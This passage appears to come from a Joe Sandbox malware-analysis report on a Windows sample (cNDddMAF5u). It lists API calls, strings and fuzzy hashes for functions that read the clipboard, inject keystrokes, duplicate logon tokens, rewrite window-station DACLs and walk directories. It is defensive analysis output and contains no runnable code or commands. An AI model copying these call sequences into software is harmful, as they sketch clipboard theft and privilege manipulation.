                                                        • Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd
                                                        Similarity
                                                        • API ID: InfoParametersSystem
                                                        • String ID:
                                                        • API String ID: 3098949447-0
                                                        • Opcode ID: 72c37776629c2f39b25da377afcb68094ce82c6a0db19cb7bdda5f9a17a49553
                                                        • Instruction ID: 01da4a31d88516dff99daa7aa6a8cbe96f4b3a395e759738e21b42d05a4076f8
                                                        • Opcode Fuzzy Hash: 72c37776629c2f39b25da377afcb68094ce82c6a0db19cb7bdda5f9a17a49553
                                                        • Instruction Fuzzy Hash: C1C09B36380304DFF2154794BC5AF107754A348B41F54C001F64D655E3C3A51470D758
                                                        APIs
                                                        • Sleep.KERNELBASE(000001F4), ref: 016D5169
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1366602900.00000000016D2000.00000040.00000020.00020000.00000000.sdmp, Offset: 016D2000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_16d2000_cNDddMAF5u.jbxd
                                                        Similarity
                                                        • API ID: Sleep
                                                        • String ID:
                                                        • API String ID: 3472027048-0
                                                        • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                        • Instruction ID: cf1e2db0d02cf6439eb29dffe50dcdb0870e7e4d909ac993a822fdd050e59f2c
                                                        • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                        • Instruction Fuzzy Hash: 6CE0E67494010DEFDB00DFB4D94969D7FB4EF04302F100261FD01D2280DA709D508A62
                                                        APIs
                                                          • Part of subcall function 006B9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 006B9BB2
                                                        • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 0073961A
                                                        • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0073965B
                                                        • GetWindowLongW.USER32(FFFFFDD9,000000F0), ref: 0073969F
                                                        • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 007396C9
                                                        • SendMessageW.USER32 ref: 007396F2
                                                        • GetKeyState.USER32(00000011), ref: 0073978B
                                                        • GetKeyState.USER32(00000009), ref: 00739798
                                                        • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 007397AE
                                                        • GetKeyState.USER32(00000010), ref: 007397B8
                                                        • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 007397E9
                                                        • SendMessageW.USER32 ref: 00739810
                                                        • SendMessageW.USER32(?,00001030,?,00737E95), ref: 00739918
                                                        • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 0073992E
                                                        • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 00739941
                                                        • SetCapture.USER32(?), ref: 0073994A
                                                        • ClientToScreen.USER32(?,?), ref: 007399AF
                                                        • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 007399BC
                                                        • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 007399D6
                                                        • ReleaseCapture.USER32 ref: 007399E1
                                                        • GetCursorPos.USER32(?), ref: 00739A19
                                                        • ScreenToClient.USER32(?,?), ref: 00739A26
                                                        • SendMessageW.USER32(?,00001012,00000000,?), ref: 00739A80
                                                        • SendMessageW.USER32 ref: 00739AAE
                                                        • SendMessageW.USER32(?,00001111,00000000,?), ref: 00739AEB
                                                        • SendMessageW.USER32 ref: 00739B1A
                                                        • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 00739B3B
                                                        • SendMessageW.USER32(?,0000110B,00000009,?), ref: 00739B4A
                                                        • GetCursorPos.USER32(?), ref: 00739B68
                                                        • ScreenToClient.USER32(?,?), ref: 00739B75
                                                        • GetParent.USER32(?), ref: 00739B93
                                                        • SendMessageW.USER32(?,00001012,00000000,?), ref: 00739BFA
                                                        • SendMessageW.USER32 ref: 00739C2B
                                                        • ClientToScreen.USER32(?,?), ref: 00739C84
                                                        • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 00739CB4
                                                        • SendMessageW.USER32(?,00001111,00000000,?), ref: 00739CDE
                                                        • SendMessageW.USER32 ref: 00739D01
                                                        • ClientToScreen.USER32(?,?), ref: 00739D4E
                                                        • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 00739D82
                                                          • Part of subcall function 006B9944: GetWindowLongW.USER32(?,000000EB), ref: 006B9952
                                                        • GetWindowLongW.USER32(?,000000F0), ref: 00739E05
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                        • Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease
                                                        • String ID: @GUI_DRAGID$F$p#w
                                                        • API String ID: 3429851547-627597586
                                                        • Opcode ID: bed654f3ef5d19c0c6aadf4a4b7b3870e4c0278d0706a50ff7625afa3a5919d3
                                                        • Instruction ID: e037ac88f4ecdd623e1b57b4e700fbf5271b26765d091b7dff10d6fb3e612bbd
                                                        • Opcode Fuzzy Hash: bed654f3ef5d19c0c6aadf4a4b7b3870e4c0278d0706a50ff7625afa3a5919d3
                                                        • Instruction Fuzzy Hash: E042CB31205240EFEB21CF28CC45AAABBE5FF49310F10465DF699972A2D7B9E860CF55
                                                        APIs
                                                        • SendMessageW.USER32(00000000,00000408,00000000,00000000), ref: 007348F3
                                                        • SendMessageW.USER32(00000000,00000188,00000000,00000000), ref: 00734908
                                                        • SendMessageW.USER32(00000000,0000018A,00000000,00000000), ref: 00734927
                                                        • SendMessageW.USER32(?,00000148,00000000,00000000), ref: 0073494B
                                                        • SendMessageW.USER32(00000000,00000147,00000000,00000000), ref: 0073495C
                                                        • SendMessageW.USER32(00000000,00000149,00000000,00000000), ref: 0073497B
                                                        • SendMessageW.USER32(00000000,0000130B,00000000,00000000), ref: 007349AE
                                                        • SendMessageW.USER32(00000000,0000133C,00000000,?), ref: 007349D4
                                                        • SendMessageW.USER32(00000000,0000110A,00000009,00000000), ref: 00734A0F
                                                        • SendMessageW.USER32(00000000,0000113E,00000000,00000004), ref: 00734A56
                                                        • SendMessageW.USER32(00000000,0000113E,00000000,00000004), ref: 00734A7E
                                                        • IsMenu.USER32(?), ref: 00734A97
                                                        • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00734AF2
                                                        • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00734B20
                                                        • GetWindowLongW.USER32(?,000000F0), ref: 00734B94
                                                        • SendMessageW.USER32(?,0000113E,00000000,00000008), ref: 00734BE3
                                                        • SendMessageW.USER32(00000000,00001001,00000000,?), ref: 00734C82
                                                        • wsprintfW.USER32 ref: 00734CAE
                                                        • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00734CC9
                                                        • GetWindowTextW.USER32(?,00000000,00000001), ref: 00734CF1
                                                        • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00734D13
                                                        • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00734D33
                                                        • GetWindowTextW.USER32(?,00000000,00000001), ref: 00734D5A
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                        • Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$MenuWindow$InfoItemText$Longwsprintf
                                                        • String ID: %d/%02d/%02d
                                                        • API String ID: 4054740463-328681919
                                                        • Opcode ID: 6cc8c88ec8e1071e624438f26c2e8aa436392df011b9e77521c016b13b561727
                                                        • Instruction ID: 387dab52879ec4c59fbbbcd9a1c547570e87c905e97c2ebe86ddf07549d56613
                                                        • Opcode Fuzzy Hash: 6cc8c88ec8e1071e624438f26c2e8aa436392df011b9e77521c016b13b561727
                                                        • Instruction Fuzzy Hash: 19120071600214ABFB298F24CC4AFAE7BF8FF45310F148169F515EA2E2DB78A941CB50
                                                        APIs
                                                        • GetForegroundWindow.USER32(00000000,00000000,00000000), ref: 006BF998
                                                        • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 006FF474
                                                        • IsIconic.USER32(00000000), ref: 006FF47D
                                                        • ShowWindow.USER32(00000000,00000009), ref: 006FF48A
                                                        • SetForegroundWindow.USER32(00000000), ref: 006FF494
                                                        • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 006FF4AA
                                                        • GetCurrentThreadId.KERNEL32 ref: 006FF4B1
                                                        • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 006FF4BD
                                                        • AttachThreadInput.USER32(?,00000000,00000001), ref: 006FF4CE
                                                        • AttachThreadInput.USER32(?,00000000,00000001), ref: 006FF4D6
                                                        • AttachThreadInput.USER32(00000000,000000FF,00000001), ref: 006FF4DE
                                                        • SetForegroundWindow.USER32(00000000), ref: 006FF4E1
                                                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 006FF4F6
                                                        • keybd_event.USER32(00000012,00000000), ref: 006FF501
                                                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 006FF50B
                                                        • keybd_event.USER32(00000012,00000000), ref: 006FF510
                                                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 006FF519
                                                        • keybd_event.USER32(00000012,00000000), ref: 006FF51E
                                                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 006FF528
                                                        • keybd_event.USER32(00000012,00000000), ref: 006FF52D
                                                        • SetForegroundWindow.USER32(00000000), ref: 006FF530
                                                        • AttachThreadInput.USER32(?,000000FF,00000000), ref: 006FF557
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                        • Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd
                                                        Similarity
                                                        • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                                        • String ID: Shell_TrayWnd
                                                        • API String ID: 4125248594-2988720461
                                                        • Opcode ID: f9f0bcc1a787bf6a16a9617c8a1b013c40baa7d5b5cf2c94595593cf22a69d1c
                                                        • Instruction ID: 18be2871d634e2bf4d2ee341ca350bb135bad633a29df26ee0adfcb6a9fc2925
                                                        • Opcode Fuzzy Hash: f9f0bcc1a787bf6a16a9617c8a1b013c40baa7d5b5cf2c94595593cf22a69d1c
                                                        • Instruction Fuzzy Hash: 11316D71A4021CBAFB216BB54C4AFBF7E6DEB44B51F104066FA00F61D1C6B49910ABA4
                                                        APIs
                                                          • Part of subcall function 007016C3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0070170D
                                                          • Part of subcall function 007016C3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0070173A
                                                          • Part of subcall function 007016C3: GetLastError.KERNEL32 ref: 0070174A
                                                        • LogonUserW.ADVAPI32(?,?,?,00000000,00000000,?), ref: 00701286
                                                        • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?), ref: 007012A8
                                                        • CloseHandle.KERNEL32(?), ref: 007012B9
                                                        • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 007012D1
                                                        • GetProcessWindowStation.USER32 ref: 007012EA
                                                        • SetProcessWindowStation.USER32(00000000), ref: 007012F4
                                                        • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00701310
                                                          • Part of subcall function 007010BF: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,007011FC), ref: 007010D4
                                                          • Part of subcall function 007010BF: CloseHandle.KERNEL32(?,?,007011FC), ref: 007010E9
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                        • Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd
                                                        Similarity
                                                        • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLogonLookupPrivilegeUserValue
                                                        • String ID: $default$winsta0$Zv
                                                        • API String ID: 22674027-1252836245
                                                        • Opcode ID: d481a6ba6e1b2e97362bcf3a4fb95470aba074cead5a98f64be3b78d7ed5c5e9
                                                        • Instruction ID: 4a38109253b7e6f0f615feb457c53a2c5f72bb6373dd70a84ebf70f2a1926836
                                                        • Opcode Fuzzy Hash: d481a6ba6e1b2e97362bcf3a4fb95470aba074cead5a98f64be3b78d7ed5c5e9
                                                        • Instruction Fuzzy Hash: 9B8189B1900249EBEF219FA4DC49FEE7BB9EF04704F148229F911B61A0C7798954CB65
                                                        APIs
                                                          • Part of subcall function 007010F9: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00701114
                                                          • Part of subcall function 007010F9: GetLastError.KERNEL32(?,00000000,00000000,?,?,00700B9B,?,?,?), ref: 00701120
                                                          • Part of subcall function 007010F9: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00700B9B,?,?,?), ref: 0070112F
                                                          • Part of subcall function 007010F9: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00700B9B,?,?,?), ref: 00701136
                                                          • Part of subcall function 007010F9: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 0070114D
                                                        • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00700BCC
                                                        • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00700C00
                                                        • GetLengthSid.ADVAPI32(?), ref: 00700C17
                                                        • GetAce.ADVAPI32(?,00000000,?), ref: 00700C51
                                                        • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00700C6D
                                                        • GetLengthSid.ADVAPI32(?), ref: 00700C84
                                                        • GetProcessHeap.KERNEL32(00000008,00000008), ref: 00700C8C
                                                        • HeapAlloc.KERNEL32(00000000), ref: 00700C93
                                                        • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00700CB4
                                                        • CopySid.ADVAPI32(00000000), ref: 00700CBB
                                                        • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00700CEA
                                                        • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00700D0C
                                                        • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00700D1E
                                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00700D45
                                                        • HeapFree.KERNEL32(00000000), ref: 00700D4C
                                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00700D55
                                                        • HeapFree.KERNEL32(00000000), ref: 00700D5C
                                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00700D65
                                                        • HeapFree.KERNEL32(00000000), ref: 00700D6C
                                                        • GetProcessHeap.KERNEL32(00000000,?), ref: 00700D78
                                                        • HeapFree.KERNEL32(00000000), ref: 00700D7F
                                                          • Part of subcall function 00701193: GetProcessHeap.KERNEL32(00000008,00700BB1,?,00000000,?,00700BB1,?), ref: 007011A1
                                                          • Part of subcall function 00701193: HeapAlloc.KERNEL32(00000000,?,00000000,?,00700BB1,?), ref: 007011A8
                                                          • Part of subcall function 00701193: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,00700BB1,?), ref: 007011B7
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                        • Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd
                                                        Similarity
                                                        • API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                                        • String ID:
                                                        • API String ID: 4175595110-0
                                                        • Opcode ID: 22e562c38cec16a24241ffb9f8fb84e55b192612fb147cc08f07782e32a8e4ec
                                                        • Instruction ID: d1373ac5102d4c9dd3439ea438bdd97c47f49009cccee20cd43ff874edf833cb
                                                        • Opcode Fuzzy Hash: 22e562c38cec16a24241ffb9f8fb84e55b192612fb147cc08f07782e32a8e4ec
                                                        • Instruction Fuzzy Hash: A1715C76A0020AEBEF11DFA4DC45FEEBBB9BF04311F048615E914B6191D779A905CBB0
                                                        APIs
                                                        • OpenClipboard.USER32(0073CC08), ref: 0071EB29
                                                        • IsClipboardFormatAvailable.USER32(0000000D), ref: 0071EB37
                                                        • GetClipboardData.USER32(0000000D), ref: 0071EB43
                                                        • CloseClipboard.USER32 ref: 0071EB4F
                                                        • GlobalLock.KERNEL32(00000000), ref: 0071EB87
                                                        • CloseClipboard.USER32 ref: 0071EB91
                                                        • GlobalUnlock.KERNEL32(00000000), ref: 0071EBBC
                                                        • IsClipboardFormatAvailable.USER32(00000001), ref: 0071EBC9
                                                        • GetClipboardData.USER32(00000001), ref: 0071EBD1
                                                        • GlobalLock.KERNEL32(00000000), ref: 0071EBE2
                                                        • GlobalUnlock.KERNEL32(00000000), ref: 0071EC22
                                                        • IsClipboardFormatAvailable.USER32(0000000F), ref: 0071EC38
                                                        • GetClipboardData.USER32(0000000F), ref: 0071EC44
                                                        • GlobalLock.KERNEL32(00000000), ref: 0071EC55
                                                        • DragQueryFileW.SHELL32(00000000,000000FF,00000000,00000000), ref: 0071EC77
                                                        • DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 0071EC94
                                                        • DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 0071ECD2
                                                        • GlobalUnlock.KERNEL32(00000000), ref: 0071ECF3
                                                        • CountClipboardFormats.USER32 ref: 0071ED14
                                                        • CloseClipboard.USER32 ref: 0071ED59
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                        • Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd
                                                        Similarity
                                                        • API ID: Clipboard$Global$AvailableCloseDataDragFileFormatLockQueryUnlock$CountFormatsOpen
                                                        • String ID:
                                                        • API String ID: 420908878-0
                                                        • Opcode ID: 403d2a0aa0ba691c5a72581165de6ca9cde2da97bd9c05bfdf3c77bf9893dc7c
                                                        • Instruction ID: ee406d6f0062ce37e0a4da5499de81d61d20c239bdff5cddb82ac2e160dbb7b2
                                                        • Opcode Fuzzy Hash: 403d2a0aa0ba691c5a72581165de6ca9cde2da97bd9c05bfdf3c77bf9893dc7c
                                                        • Instruction Fuzzy Hash: 0261F4752042019FE311EF28D889F6A77E4AF85704F18851DF846972E2CB39DD85CB66
                                                        APIs
                                                        • FindFirstFileW.KERNEL32(?,?), ref: 007169BE
                                                        • FindClose.KERNEL32(00000000), ref: 00716A12
                                                        • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00716A4E
                                                        • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00716A75
                                                          • Part of subcall function 006A9CB3: _wcslen.LIBCMT ref: 006A9CBD
                                                        • FileTimeToSystemTime.KERNEL32(?,?), ref: 00716AB2
                                                        • FileTimeToSystemTime.KERNEL32(?,?), ref: 00716ADF
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                        • Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd
                                                        Similarity
                                                        • API ID: Time$File$FindLocalSystem$CloseFirst_wcslen
                                                        • String ID: %02d$%03d$%4d$%4d%02d%02d%02d%02d%02d$%4d%02d%02d%02d%02d%02d%03d
                                                        • API String ID: 3830820486-3289030164
                                                        • Opcode ID: bbcf526e2609013a0123f1fd663d98d64b3365d9c3edb8becebefe6ba5e729a1
                                                        • Instruction ID: 6628910c339f205b17eb2d467654188cf52322b6679eccc53ab9395940c83676
                                                        • Opcode Fuzzy Hash: bbcf526e2609013a0123f1fd663d98d64b3365d9c3edb8becebefe6ba5e729a1
                                                        • Instruction Fuzzy Hash: 56D15EB2508300AEC354EBA4CC81EABB7EDBF89704F44491DF585D6191EB38DE48CB66
                                                        APIs
                                                        • FindFirstFileW.KERNEL32(?,?,771A8FB0,?,00000000), ref: 00719663
                                                        • GetFileAttributesW.KERNEL32(?), ref: 007196A1
                                                        • SetFileAttributesW.KERNEL32(?,?), ref: 007196BB
                                                        • FindNextFileW.KERNEL32(00000000,?), ref: 007196D3
                                                        • FindClose.KERNEL32(00000000), ref: 007196DE
                                                        • FindFirstFileW.KERNEL32(*.*,?), ref: 007196FA
                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 0071974A
                                                        • SetCurrentDirectoryW.KERNEL32(00766B7C), ref: 00719768
                                                        • FindNextFileW.KERNEL32(00000000,00000010), ref: 00719772
                                                        • FindClose.KERNEL32(00000000), ref: 0071977F
                                                        • FindClose.KERNEL32(00000000), ref: 0071978F
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                        • Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd
                                                        Similarity
                                                        • API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
                                                        • String ID: *.*
                                                        • API String ID: 1409584000-438819550
                                                        • Opcode ID: 91b5cd6d218f9d0d18ca9fd1343d7b6f0e6746669f4b503f64bdbd0c0f10cd38
                                                        • Instruction ID: 3ce0f25f6a1569c6b1784ff24519d938b833c04512a62d50cdc403c9ec6d8a5a
                                                        • Opcode Fuzzy Hash: 91b5cd6d218f9d0d18ca9fd1343d7b6f0e6746669f4b503f64bdbd0c0f10cd38
                                                        • Instruction Fuzzy Hash: 8E31D5725012196AEF15AFB8DC19EDE77ACAF09321F108155F905E30D0DB3CDE818B24
                                                        APIs
                                                        • FindFirstFileW.KERNEL32(?,?,771A8FB0,?,00000000), ref: 007197BE
                                                        • FindNextFileW.KERNEL32(00000000,?), ref: 00719819
                                                        • FindClose.KERNEL32(00000000), ref: 00719824
                                                        • FindFirstFileW.KERNEL32(*.*,?), ref: 00719840
                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 00719890
                                                        • SetCurrentDirectoryW.KERNEL32(00766B7C), ref: 007198AE
                                                        • FindNextFileW.KERNEL32(00000000,00000010), ref: 007198B8
                                                        • FindClose.KERNEL32(00000000), ref: 007198C5
                                                        • FindClose.KERNEL32(00000000), ref: 007198D5
                                                          • Part of subcall function 0070DAE5: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 0070DB00
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                        • Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd
                                                        Similarity
                                                        • API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
                                                        • String ID: *.*
                                                        • API String ID: 2640511053-438819550
                                                        • Opcode ID: 9ff0a39c8b4446fc6d0cced040b17c557883a25af446ab0c033bcb77c8d79e41
                                                        • Instruction ID: fdd8dd5c6f38a39edd9026843a6a02e5afa8968be3dc809157535169d2addeb8
                                                        • Opcode Fuzzy Hash: 9ff0a39c8b4446fc6d0cced040b17c557883a25af446ab0c033bcb77c8d79e41
                                                        • Instruction Fuzzy Hash: 2431C572500219AEEF11AFB8DC58ADE77ACEF06321F108155E915A30D0DB38DEC6CB24
                                                        APIs
                                                        • GetLocalTime.KERNEL32(?), ref: 00718257
                                                        • SystemTimeToFileTime.KERNEL32(?,?), ref: 00718267
                                                        • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00718273
                                                        • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00718310
                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 00718324
                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 00718356
                                                        • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 0071838C
                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 00718395
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
